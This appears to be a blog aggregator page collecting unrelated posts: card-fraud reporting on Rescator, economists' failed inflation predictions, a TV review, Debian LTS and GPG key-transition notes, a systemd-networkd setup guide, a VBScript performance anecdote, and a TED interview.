    Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

    Group-IB also listed the stats on how many of Rescator’s cards turned out to be useful for cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 of the 151,720 — or about 28 percent – of Rescator’s cards that were sold on Swiped1[dot]su came back as declined when run through the site’s checking service.

    The swiped1[dot]su login page.


    Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time.

    One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

    The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

    For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.

    Sociological Images: How (Some) Economists Are Like Doomsday Cult Members

    Four years ago, twenty-three economists (mostly conservative) signed a letter to Ben Bernanke warning that the Fed’s quantitative easing policy – adding billions of dollars to the economy – would be disastrous. It would “debase the currency,” create high inflation, distort financial markets, and do nothing to reduce unemployment.

    Four years later, it’s clear that they were wrong (as Paul Krugman never tires of reminding us). Have they changed their beliefs?

    Of course not.

    Bloomberg asked the letter-signers what they now thought about their prophecy.  Here’s the headline: “Fed Critics Say ’10 Letter Warning Inflation Still Right.”
    This despite the actual low inflation:

    I don’t know why I assume that high-level economists would be more likely than some ordinary people to change their ideas to adjust for new facts. Fifty years ago, in The Structure of Scientific Revolutions, Thomas Kuhn showed that even in areas like chemistry and physics, scientists cling to their paradigms even in the face of accumulated anomalous facts. Why should big-shot economists be any different? It also occurs to me that it’s the most eminent in a profession who will be more resistant to change.  After all, it’s the people at the top who have the greatest amount invested in their ideas – publications, reputations, consultantships, and of course ego. Economists call these “sunk costs.”

    So how do they maintain their beliefs?

    Most of the 23 declined to comment; a few could not be reached (including Ronald McKinnon, who died the previous day). Of those who responded, only one, Peter Wallison at the American Enterprise Institute, came close to saying, “My prediction was wrong.”

    “All of us, I think, who signed the letter have never seen anything like what’s happened here.”

    Most of the others preferred denial:

    “The letter was correct as stated.” (David Malpass. He worked in Treasury under Reagan and Bush I)

    “The letter mentioned several things… and all have happened.” (John Taylor, Stanford)

    “I think there’s plenty of inflation — not at the checkout counter, necessarily, but on Wall Street.” (Jim Grant of “Grant’s Interest Rate Observer.” Kinda makes you wonder how closely he’s been observing interest rates.)

    Then there was equivocation. After Thursday night’s debacle – Giants 8, Pirates 0, knocking Pittsburgh out of the playoffs– someone reminded me, “Hey, didn’t you tell me that the Pirates would win the World Series?”

    “Yes, but I didn’t say when.”

    Some of the letter-signers used this same tactic, and just about as convincingly.

    “Note that word ‘risk.’ And note the absence of a date.” (Niall Ferguson, Harvard)

    “Inflation could come…” (Amity Shlaes, Calvin Coolidge Memorial Foundation)

    The 1954 sociology classic When Prophecy Fails describes a group built around a prediction that the world would soon be destroyed and that they, the believers, would be saved by flying saucers from outer space. When it didn’t happen, they too faced the problem of cognitive dissonance – dissonance between belief and fact. But because they had been very specific about what would happen and when it would happen, they could not very well use the denial and equivocation favored by the economists. Instead, they first claimed that what had averted the disaster was their own faith. By meeting and planning and believing so strongly in their extraterrestrial rescuers, they had literally saved the world. The economists, by contrast, could not claim that their warnings saved us from inflation, for their warning – their predictions and prescriptions – had been ignored by the Fed. So instead they argue that there actually is, or will be, serious inflation.

    The other tactic that the millenarian group seized on was to start proselytizing – trying to convert others and to bring new members into the fold.  For the conservative economists, this tactic is practically a given, but it is not necessarily a change.  They had already been spreading their faith, as professors and as advisors (to policy makers, political candidates, wealthy investors, et al.). They haven’t necessarily redoubled their efforts, but the evidence has not given them pause.  They continue to publish their unreconstructed views to as wide an audience as possible.

    That’s the curious thing about cognitive dissonance. The goal is to reduce the dissonance, and it really doesn’t matter how.  Of course, you could change your ideas, but letting go of long and deeply held ideas when the facts no longer co-operate is difficult. Apparently it’s easier to change the facts (by denial, equivocation, etc.). Or, equally effective in reducing the dissonance, you can convince others that you are right. That validation is just as effective as a friendly set of facts, especially if it comes from powerful and important people and comes with rewards both social and financial.

    Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

    (View original at http://thesocietypages.org/socimages)

    RacialiciousMy Fair Selfie?

    by Guest Contributor Deepa

    Hi, my name is Deepa, and I’m excited to be reviewing ABC’s new fall show Selfie for you!

    When I first heard the premise of Selfie, I was pretty skeptical. It was billed as a modern-day version of the musical My Fair Lady, a story that is very much of a specific time and place. Set in London in the early 1910s, the musical (based on George Bernard Shaw’s play Pygmalion) is the story of Eliza Doolittle, a working-class woman who wants to improve her circumstances.

    Enter Professor Henry Higgins, who is one of those unashamedly arrogant and misogynistic assholes that all of us have met at some point. By virtue of his apparent brilliance in the field of phonetics, Eliza decides he is the only one who can help her lose her Cockney accent, which, Higgins says, is what truly ties her to her class. With the help of his friend Colonel Pickering (a much more chivalrous but no less patronizing gentleman), Higgins teaches Eliza not only to speak differently, but to conduct herself in high society. But when I found out that the Henry Higgins character would be portrayed not only by a person of color, but by John Cho, I decided I wanted to give it a try.

    Some of my initial uncertainty may have come from the fact that I am a huge My Fair Lady fan. Growing up in the Pacific Northwest region of the United States, I was a first-gen kid with proudly progressive Indian parents. My mom, in particular, grew up in the Indian state of Kerala, which historically had a matrilineal society, and her family prioritized education and career for their sons and daughters. I was raised to be strongly feminist and anti-racist, and to confront my own socioeconomic and educational privilege. And I was also fortunate enough to be surrounded by people who mostly felt the same way.

    As such, my first exposure to overt sexism and classism came from the film version of My Fair Lady, which I’ve loved since I was four years old.

    My Fair Lady is also an obvious product of imperialist Britain. The movie appears to take place in that mythical all-white London that we’ve been shown so many times in popular culture.

    Most of the obvious prejudice relates to class or to the other nationalities within the United Kingdom. There are a few throwaway references to other countries that are casually racist: for one, the lyric in “Why Can’t the English?” that the Arabians learn Arabian/which is absolutely frightening – does a phoneticist really not know the language is Arabic?

    And of course there is the fact that Colonel Pickering has just returned from India where, he says, he has been studying their “147 distinct dialects”. Even as a child, I used to yell at the screen that India has thousands of distinct languages let alone dialects, get your facts right, Pickering.

    And yet, it is a film that is beloved to many South Asians that I know, despite racist undertones, because Eliza Doolittle is such a compelling character – and Henry Higgins, while deplorable, is a fascinating foil for her.

    So while Selfie purports to be a modern-day American version of My Fair Lady, it’s not only the time period that is drastically different.

    The show begins by introducing Eliza Dooley (Karen Gillan), who fled from memories of childhood bullying by reinventing herself on social media. Unfortunately, the fix is superficial: she is widely “liked” on Instagram, Facebook, and other forms of social media, but she has no real friends.

    In the opening scene, Eliza embarrasses herself in front of a plane full of her coworkers when she a) finds out that her office “boyfriend” is in fact a married man, b) throws up into two barf bags in shock, c) gets covered with vomit when the bags break on her way to the bathroom, and d) emerges wearing strategically-wrapped airplane blankets instead of clothing. After her public humiliation, Eliza comes upon a solution to make her way back up from rock bottom.

    At Eliza’s job, the morning staff meeting is all about celebrating the work of marketing genius Henry Higgins (John Cho), who managed to take the company’s pediatric nasal spray, which (allegedly!) caused Satanic hallucinations, and successfully rebrand it. Easily my favorite character in this scene is the gleeful and wildly inappropriate CEO (David Harewood), who smacks a kiss onto Henry’s lips (CEO: “You know, I read an article that said Asian men are more comfortable kissing on the lips as a sign of friendship.” What?) and invites Henry to his daughter’s wedding that weekend, asking him to bring a date because “you’re always alone, it’s kind of weird.”

    In my head, John-Cho-as-Henry starts defiantly singing “I’d prefer a new edition of the Spanish Inquisition than to ever let a woman in my life!” but sadly this does not happen.

    Henry returns to his office to find Eliza there with a proposition: if he can rebrand a dangerous pharmaceutical product, can’t he help her change her image? “What,” Henry replies, “you mean be a better person?”

    “Or that,” says Eliza.

    Henry agrees to the challenge of trying to “repackage” Eliza (possibly a reference to My Fair Lady’s Higgins frequently calling Eliza Doolittle “baggage”?), and so the lessons begin. The first: for Eliza to greet the office’s receptionist, Charmonique, and ask her about her day. Note that in an earlier scene, we don’t see Henry take any particular notice of Charmonique either, but all that doesn’t matter! Not when this is a perfect opportunity to mansplain common decency to Eliza!

    Charmonique is clearly used to these kinds of micro-aggressions, which she most likely faces frequently as a woman of color working as a receptionist in this office, and when Eliza can’t even remember her name she seems at first to take pity on her. But even Charmonique is rightly upset when Eliza adds, “In my defense, that’s not a real name.” Wonderful, Eliza, that’s totally not an offensive racial stereotype or anything!

    Of course, Henry’s next instruction takes the form of a “test” for Eliza: accompany him to their CEO’s daughter’s wedding, to see if she can behave herself in a social setting. There’s a predictable make under to get Eliza ready for the wedding, which she predictably screws up by making noises on her phone to distract herself from the genuine emotion of the ceremony – as, we learn through a flashback, Eliza has been doing since she was an unpopular child.

    After everyone else has left the church, Henry and Eliza have it out. Henry doesn’t understand why Eliza would embarrass herself and him with such an obvious social faux pas, and he thinks he’s made a huge mistake by offering to help her. Eliza counters that maybe she’s the one who’s been helping him, since he didn’t even have a date for this wedding before he asked her. She then tells him exactly what she thinks of him: that he’s anti-social and holier-than-thou and un-fun, and at one point she even calls him a cockscomb. (John Cho’s hurt face when she calls him un-fun is my favorite thing in the entire episode.)

    “Oh, I’m a cockscomb, am I?” says Henry. “Well, you, my dear, are a lost cause.”

    And after storming out, it looks like both of them are ready to give up on the entire venture. But the next day at work, Eliza finds herself having a friendly conversation with Charmonique as if it’s completely natural, a conversation that has nothing to do with Eliza herself. “Whatever you’re doing with Mr. Man, it’s working,” says Charmonique.

    So Eliza goes to Henry’s house to apologize, and to explain that she hadn’t been on her phone from boredom, but because the wedding gave her feels (“Feels?” says a bewildered Henry, and I agree) that she wanted to suppress. And despite the scene playing out pretty much exactly as you’d expect – there’s even some gallivanting around in the rain to show how much Eliza and Henry are making a real connection – it’s still cute, and feels genuine enough to actually be the start of a wonderful friendship, or at least something close to it.

    Selfie started to confuse me a little with its My Fair Lady parallels, or lack thereof – because My Fair Lady is a story about changing a person’s outward behavior and mannerisms rather than looking inward.

    Sure, Higgins and Pickering think they are improving Eliza Doolittle’s character along with her elocution, but it’s clear that their perspectives come from their overweening class privilege. To them even the façade of a well-mannered and well-spoken lady is of more substance than the reality of a common flower girl. (Not that Higgins has much esteem for even the most respectable of women.)

    What has always kept My Fair Lady in a different category from the She’s All That rom-com formula is that, at the end of the story, neither Eliza nor Higgins has been substantially changed by the other.

    By the end, Eliza realizes that the process of “becoming a lady” may have even diminished her own personality and freedom, but she’s determined not to let that continue. Higgins’s heart is perhaps a little softened by Eliza’s influence, but really, just a very, very little – he’s still a snob and an unapologetic asshole. It’s a story about trying to use the tools of a rule-obsessed society against the very class that wields them. And in that aim, it’s a story with an ambiguous ending.

    So it’ll be interesting to see how Selfie interprets the original Henry Higgins – who knows the rules of his society but has enough privilege to get away with flouting them himself, and who definitely does not know much about being a good person – into this modern version, who “finds it rather easy not to form personal connections in a city that only values wireless connection”, whose curmudgeonly behavior seems to be because he’s written off modern American society as narcissistic and shallow.

    Is Selfie going to flip the original premise and go the simplistic-but-heartwarming route, trying to make the modern Eliza and Henry both “better people” who discover their “true selves” through their friendship (or maybe more)? Or is it going to be more complex than that?

    Hopefully, the fact that the cast features a number of actors of color will help add to that complexity.

    To take the character of Henry Higgins, who is the very definition of privilege in My Fair Lady (see, again, the song “I’m An Ordinary Man”, in which Higgins explains that all he expects from life is to be able to do whatever he wants, regardless of how it affects anyone else) and to take away or twist some of that privilege – it could turn out to be very interesting. The mere fact that John Cho is playing a rom-com lead in a sitcom not focused on race or ethnicity is groundbreaking – particularly since Asian men are often desexualized in popular culture. We’ll see if that gets addressed in ways that are less awkwardly humorous in the future (though “Kissing Koreans: Greenlight!” is a hilarious headline).

    I have similar hopes for black CEO Sam Saperstein, who is married to a white woman, and whose biracial daughter is marrying a white man, without comment – and Charmonique, who stole every scene she was in.

    Sitcoms tend to deal one of two ways with race – either offensively, or with willful “color-blindness” – but I think Selfie might be able to find a middle-ground instead.

    The post My Fair Selfie? appeared first on Racialicious - the intersection of race and pop culture.

    Planet Linux AustraliaBen Martin: Sliding around... spinning around.

    The wiring and electronics for the new omniwheel robot are coming together nicely. Having wired this up using 4 individual stepper controllers, one sees the value in commissioning a custom base board for the stepper drivers to plug into. I still have to connect an IMU to the beast, so precision strafing will (hopefully) be obtainable. The sparkfun mecanum video has the more traditional two wheels each side design, but does wobble a bit when strafing.


    Apart from the current requirements the new robot is also really heavy, probably heavier than Terry. I'm still working out what battery to use to meet the high current needs of four reasonable steppers on the move.

    CryptogramDEA Sets Up Fake Facebook Page in Woman's Name

    This is a creepy story. A woman has her phone seized by the Drug Enforcement Agency and gives them permission to look at her phone. Without her knowledge or consent, they steal photos off of the phone (the article says they were "racy") and use them to set up a fake Facebook page in her name.

    The woman sued the government over this. Extra creepy was the government's defense in court: "Defendants admit that Plaintiff did not give express permission for the use of photographs contained on her phone on an undercover Facebook page, but state the Plaintiff implicitly consented by granting access to the information stored in her cell phone and by consenting to the use of that information to aid in an ongoing criminal investigations [sic]."

    The article was edited to say: "Update: Facebook has removed the page and the Justice Department said it is reviewing the incident." So maybe this is just an overzealous agent and not official DEA policy.

    But as Marcy Wheeler said, this is a good reason to encrypt your cell phone.

    CryptogramFOXACID Operations Manual

    A few days ago, I saw this tweet: "Just a reminder that it is now *a full year* since Schneier cited it, and the FOXACID ops manual remains unpublished." It's true.

    The citation is this:

    According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head -- all delivered from a FOXACID subsystem called Ferret Cannon.

    Back when I broke the QUANTUM and FOXACID programs, I talked with the Guardian editors about publishing the manual. In the end, we decided not to, because the information in it wasn't useful to understanding the story. It's been a year since I've seen it, but I remember it being just what I called it: an operation procedures manual. It talked about what to type into which screens, and how to deal with error conditions. It didn't talk about capabilities, either technical or operational. I found it interesting, but it was hard to argue that it was necessary in order to understand the story.

    It will probably never be published. I lost access to the Snowden documents soon after writing that essay -- Greenwald broke with the Guardian, and I have never been invited back by the Intercept -- and there's no one looking at the documents with an eye to writing about the NSA's technical capabilities and how to securely design systems to protect against government surveillance. Even though we now know that the same capabilities are being used by other governments and cyber criminals, there's much more interest in stories with political ramifications.

    Planet Linux AustraliaAndrew Pollock: [life] Day 259: Kindergarten, more demos and play dates

    I was pretty exhausted after yesterday, so getting out of bed this morning took some serious effort. I started the day with a chiropractic adjustment and then got stuck into doing the obligatory "pre-cleaner clean" and preparing for my third Thermomix demonstration.

    The cleaners arrived and I headed off around the corner. My host thought the demo was starting at 10:30am, so I again had a bit of extra time up my sleeve.

    My Group Leader, Maria, came to observe this demo, and I thought she was just going to be incognito, but to my pleasant surprise, she actually helped out with some of the washing up throughout the demo, which made it easier.

    The demo went really well, and I was happy with how it went, and Maria gave me really positive feedback as well, so I was really stoked.

    I got home with enough time to collapse on the couch with a book for half an hour before I biked to Kindergarten to pick up Zoe.

    As we were heading out, I realised I'd left her helmet at home on her scooter. That's what I get for not putting it back on her bike trailer. So I sent her to Megan's house and biked home to pick up the helmet and headed back again. Two runs up Hawthorne Road in the afternoon heat was a good bit of exercise.

    After a brief play at Megan's, we headed home, and I started dinner. For some reason, I was super organised tonight and had dinner on the table nice and early, and everything cleaned up afterwards, so we had plenty of time to go out for a babyccino before bath time and bed time, and I still managed to get Zoe to bed a little early, and I didn't have any cleaning up to do afterwards.

    It's been a good day.

    Worse Than FailureCodeSOD: Line by Line

    In the bowels of a business unit, a director got a great deal on a third party software package. He bought it, without talking to corporate IT, and then was upset when it couldn’t gracefully integrate with any of the corporate IT assets. Eager to throw good money after bad, the director hired his nephew’s consultancy to build an integration tool to make his new toy work.

    A few months later, the users complained about performance, and somehow, fixing this thing became Jeff’s problem. The process was simple enough: slurp enterprise data out of a text file, and pass the data on to the third-party tool. It didn’t take Jeff long to figure out why it performed poorly:

    Private Sub ProcessFile()
    
        ' prepare to do stuff
    
        Do Until blnLastTime = True
            
            Set fileReader = fso.OpenTextFile(strFileName)
            
             If fileReader.AtEndOfStream = True Then
                blnLastTime = True
             Else
                strTextLine = fileReader.ReadLine
             End If
    
            ' actually do stuff
             
            fileReader.Close
            Delete_Line (strFileName)
        Loop
        fileReader.Close
    
    End Sub
    
    
    
    Private Sub Delete_Line(strFile)
    
        Set fileReader = fso.OpenTextFile(strFile)
        
        If fso.FileExists(strFile & "2") Then
            fso.DeleteFile (strFile & "2")
        End If
        
        Set fileWriter = fso.CreateTextFile(strFile & 2)
        
        If fileReader.AtEndOfStream = False Then
            fileReader.ReadLine
        End If
        
        If fileReader.AtEndOfStream = False Then
                strLine = fileReader.ReadAll
                fileWriter.Write (strLine)
        End If
        
        
        fileReader.Close
        fileWriter.Close
    
        fso.DeleteFile strFile, True
        fso.CopyFile strFile & "2", strFile, True
        fso.DeleteFile strFile & 2, True
        
    End Sub

    Start by opening a file “foo.txt”. Read a single line from the file. Send it to the third party app. Close the file. Open “foo.txt” again. Open another file, called “foo.txt2”. Read the first line from “foo.txt”, again. Throw that away. Read the remainder of “foo.txt”, and write it to “foo.txt2”. Copy “foo.txt2” back over “foo.txt”. Now, go back to the top of the loop and read a single line from “foo.txt” again.


    So, for a 10,000 line file, this would perform 30,000 file open operations, write nearly 50 million lines, delete 20,000 files, and perform 10,000 copy operations. It didn’t take Jeff very long to rewrite this to simply read the file, one line at a time. The runtime dropped from a few hours to less than a minute.

    Planet DebianRaphaël Hertzog: Freexian’s second report about Debian Long Term Support

    Like last month, here comes a report about the work of paid contributors to Debian LTS.

    Individual reports

    In September 2014, 3 contributors have been paid for 11h each. Here are their individual reports:

    Evolution of the situation

    Compared to last month, we have gained 5 new sponsors, that’s great. We’re now at almost 25% of a full-time position. But we’re not done yet. We believe that we would need at least twice as many sponsored hours to do a reasonable work with at least the most used packages, and possibly four times as much to be able to cover the full archive.

    We’re now at 39 packages that need an update in Squeeze (+9 compared to last month), and the contributors paid by Freexian did handle 11 during last month (this gives an approximate rate of 3 hours per update, CVE triage included).

    Open questions

    Dear readers, what can we do to convince more companies to join the effort?

    The list of sponsors contains almost exclusively companies from Europe. It’s true that Freexian’s offer is in Euro but the economy is world-wide and it’s common to have international invoices. When Ivan Kohler asked if having an offer in dollar would help convince other companies, we got zero feedback.

    What are the main obstacles that you face when you try to convince your managers to get the company to contribute?

    By the way, we prefer that companies take small sponsorship commitments that they can afford over multiple years over granting lots of money now and then not being able to afford it for another year.

    Thanks to our sponsors

    Let me thank our main sponsors:

    Planet DebianMatthew Palmer: My entry in the "Least Used Software EVAH" competition

    For some reason, I seem to end up writing software for very esoteric use-cases. Today, though, I think I’ve outdone myself: I sat down and wrote a Ruby library to get and set process resource limits – those things that nobody ever thinks about except when they run out of file descriptors.

    I didn’t even have a direct need for it. Recently I was grovelling through the EventMachine codebase, looking at the filehandle limit code, and noticed that the pure-ruby implementation didn’t manipulate filehandle limits. I considered adding it, then realised that there wasn’t a library available to do it. Since I haven’t berked around with FFI for a while, I decided to write rlimit. Now to find the time to write that patch for EventMachine…

    Since I doubt there are many people who have a burning need to manipulate rlimits in Ruby, this gem will no doubt sit quiet and undisturbed in the dark, dusty corners of rubygems.org. However, for the three people on earth who find this useful: you’re welcome.


    Rondam RamblingsHarris, Affleck, Dawkins, oh my!

    It's been a busy couple of days for people who like to opine on the evils of Islam and Islamophobia.  Sam Harris and Ben Affleck kicked things off with a segment on Bill Maher's show where they had quite the scuffle over whether or not Harris was justified in his anti-Islamic rhetoric, or whether Affleck was trying to deny the truth in the name of political correctness. Lots and lots and lots of

    Planet DebianJulian Andres Klode: Key transition

    I started transitioning from 1024D to 4096R. The new key is available at:

    https://people.debian.org/~jak/pubkey.gpg

    and the keys.gnupg.net key server. A very short transition statement is available at:

    https://people.debian.org/~jak/transition-statement.txt

    and included below (the http version might get extended over time if needed).

    The key consists of one master key and 3 sub keys (signing, encryption, authentication). The sub keys are stored on an OpenPGP v2 Smartcard. That’s really cool, isn’t it?

    Somehow it seems that GnuPG 1.4.18 also works with 4096R keys on this smartcard (I accidentally used it instead of gpg2 and it worked fine), although only GPG 2.0.13 and newer is supposed to work.

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1,SHA512
    
    Because 1024D keys are not deemed secure enough anymore, I switched to
    a 4096R one.
    
    The old key will continue to be valid for some time, but i prefer all
    future correspondence to come to the new one.  I would also like this
    new key to be re-integrated into the web of trust.  This message is
    signed by both keys to certify the transition.
    
    the old key was:
    
    pub   1024D/00823EC2 2007-04-12
          Key fingerprint = D9D9 754A 4BBA 2E7D 0A0A  C024 AC2A 5FFE 0082 3EC2
    
    And the new key is:
    
    pub   4096R/6B031B00 2014-10-14 [expires: 2017-10-13]
          Key fingerprint = AEE1 C8AA AAF0 B768 4019  C546 021B 361B 6B03 1B00
    
    

    Filed under: Uncategorized
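A check a reader can run before trusting the new key, added here as an example and not part of the original post: it parses the two key lines from the transition statement, confirms each short key ID is the tail of its fingerprint, and compares the new key's full 40-hex fingerprint with the primary-key `fpr` record of a `gpg --with-colons --fingerprint` style listing. The listings are constructed samples and the function names are hypothetical.

```python
import re

# Key lines copied from the transition statement on this page.
STATEMENT = """\
the old key was:

pub   1024D/00823EC2 2007-04-12
      Key fingerprint = D9D9 754A 4BBA 2E7D 0A0A  C024 AC2A 5FFE 0082 3EC2

And the new key is:

pub   4096R/6B031B00 2014-10-14 [expires: 2017-10-13]
      Key fingerprint = AEE1 C8AA AAF0 B768 4019  C546 021B 361B 6B03 1B00
"""

# Constructed colon-format listings (not real gpg output). The sub-key values
# and the look-alike key are made-up placeholders.
GOOD_LISTING = (
    "pub:-:4096:1:021B361B6B031B00:1413244800:1507852800::-:::scESC:\n"
    "fpr:::::::::AEE1C8AAAAF0B7684019C546021B361B6B031B00:\n"
    "sub:-:4096:1:1111111111111111:1413244800:1507852800:::::s:\n"
    "fpr:::::::::" + "1" * 40 + ":\n"
)
# Same 8-hex key ID as the new key, different fingerprint everywhere else.
LOOKALIKE_LISTING = (
    "pub:-:4096:1:000000006B031B00:1413244800:::-:::scESC:\n"
    "fpr:::::::::" + "0" * 32 + "6B031B00:\n"
)

PUB_RE = re.compile(r"^pub\s+(\d+)([A-Za-z])/([0-9A-Fa-f]{8})\b")
FPR_RE = re.compile(r"^Key fingerprint\s*=\s*([0-9A-Fa-f ]+)$")


def parse_statement(text):
    """Return one dict per pub/fingerprint pair, in the order they appear."""
    keys, pending = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PUB_RE.match(line)
        if m:
            pending = {"bits": int(m.group(1)), "algo": m.group(2).upper(),
                       "short_id": m.group(3).upper()}
            continue
        m = FPR_RE.match(line)
        if m and pending is not None:
            fpr = m.group(1).replace(" ", "").upper()
            if len(fpr) != 40:
                raise ValueError("not a 160-bit v4 fingerprint: %r" % fpr)
            # A v4 short key ID is the low 32 bits of the fingerprint.
            if not fpr.endswith(pending["short_id"]):
                raise ValueError("key ID %s is not the tail of %s"
                                 % (pending["short_id"], fpr))
            pending["fingerprint"] = fpr
            keys.append(pending)
            pending = None
    return keys


def primary_fingerprints(colons):
    """Fingerprints of primary keys only: the fpr record that follows a pub
    record. fpr records that follow a sub record belong to sub-keys."""
    fprs, want = [], False
    for rec in colons.splitlines():
        fields = rec.split(":")
        if fields[0] in ("pub", "sec"):
            want = True
        elif fields[0] in ("sub", "ssb"):
            want = False
        elif fields[0] == "fpr" and want and len(fields) > 9:
            fprs.append(fields[9].upper())
            want = False
    return fprs


def check_new_key(statement, colons):
    """Return a list of problems; an empty list means the listing holds
    exactly the new key named in the statement."""
    keys = parse_statement(statement)
    if len(keys) != 2:
        return ["expected an old and a new key, found %d" % len(keys)]
    new = keys[1]
    found = primary_fingerprints(colons)
    problems = []
    if len(found) != 1:
        problems.append("listing holds %d primary keys, expected 1" % len(found))
    if new["fingerprint"] not in found:
        problems.append("no primary key with fingerprint " + new["fingerprint"])
    return problems


def short_id_matches(statement, colons):
    """The weak check, for contrast: compare only the 8-hex key ID."""
    new = parse_statement(statement)[-1]
    return any(f.endswith(new["short_id"]) for f in primary_fingerprints(colons))


if __name__ == "__main__":
    print(check_new_key(STATEMENT, GOOD_LISTING))
    print(short_id_matches(STATEMENT, LOOKALIKE_LISTING),
          check_new_key(STATEMENT, LOOKALIKE_LISTING))
```

The look-alike listing passes the 8-hex comparison and fails the full-fingerprint one, which is why the statement's fingerprint lines, not the `6B031B00` ID, are the value to pin.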

    Planet DebianJoachim Breitner: Switching to systemd-networkd

    Ever since I read about systemd-networkd being in the making I was looking forward to trying it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

    My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interfaces. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

    $ cat > /etc/systemd/network/eth.network <<__END__
    [Match]
    Name=eth0
    [Network]
    DHCP=yes
    __END__
    $ systemctl enable systemd-networkd
    $ systemctl start systemd-networkd

    I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

    But then I was bitten by what I guess some people call the viral nature of systemd: systemd-networkd would not update /etc/resolv.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolv.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolv.conf directly.

    So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

    [Unit]
    Description=WPA supplicant daemon (interface-specific version)
    Requires=sys-subsystem-net-devices-%i.device
    After=sys-subsystem-net-devices-%i.device
    
    [Service]
    Type=simple
    ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I
    
    [Install]
    Alias=multi-user.target.wants/wpa_supplicant@%i.service

    Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

    [Match]
    Name=wlan0
    [Network]
    DHCP=yes

    does the rest.

    So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

    The only thing that I’m missing so far is a way to trigger actions when the network configuration changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

    TEDMusings of a male granny: This retired schoolteacher spends his free time Skyping with Indian schoolkids


    Kids at a school in India gather around a computer as David Swancott leads a School in the Cloud session.

    David Swancott is a retired biology teacher who lives an hour southeast of Bordeaux, France. He spends his free time bicycling, traveling and, for the past two years, being a “Skype Granny.” Swancott is a part of the “Granny Cloud,” a project created by 2013 TED Prize winner Sugata Mitra to make teachers available online to mentor children participating in his School in the Cloud. As children explore the big questions that matter to them, they get nudges in the right direction from a Skype Granny. But don’t let the name fool you. While many Granny Cloud participants are female and retired, just as many are male or in their 20s, 30s and 40s.

    Now that the school year is underway, the TED Prize Blog checked in with one of our male grannies to ask about his experience mentoring kids through the Granny Cloud.

    You’re retired, living in the countryside. What inspired you to become a Skype Granny for School in the Cloud?

    I found out about it on television—on the BBC’s The One Show, which follows the evening news. They did a segment about the Granny Cloud, and it stirred my interest. I thought, “That’s something I might like to be involved with.” I missed being in contact with children. So I got in touch with the contact provided on the show’s website, downloaded an application form and, after an interview and orientation, I became a Skype Granny. Once a teacher, always a teacher.

    Every Tuesday morning, you Skype with young students at two different schools in India. Can you talk us through a typical session?

    Last week, one group came on and immediately wanted to know about butterflies. So as time was tight, I quickly hunted out a National Geographic video on the monarch butterfly and we watched that. Afterwards, we talked through what they’d seen. I asked questions and together we explored the life cycle of a butterfly.

    Sessions last between 30 and 45 minutes. We usually start by spending some time talking about the things that have happened during the week, then I show them some photos or a video or written material, usually on a topic they decided on the week before. We spend time talking about the material. I try to get them to input as much as possible — picking out new vocabulary, checking spelling and so on.

    You’re the grandfather of two young boys and taught high school in England for more than 40 years, which means you must be very patient. What are some challenges you’ve come across being a Skype Granny?

    Well, you have to think on your feet a bit sometimes and be willing to move with the children if they go off on a tangent. Quite often, there are problems with sound or vision or even both, and we have to resort to communication by text. There’s also no guarantee that the Internet will work at all, as the facilities in some areas are so poor. On one occasion, the line to the school was attacked by monkeys and it took a while for it to be repaired, as the school is in a very remote area.

    Another School in the Cloud session, with kids gathered around a computer.

    What’s the best thing about being a Skype Granny?

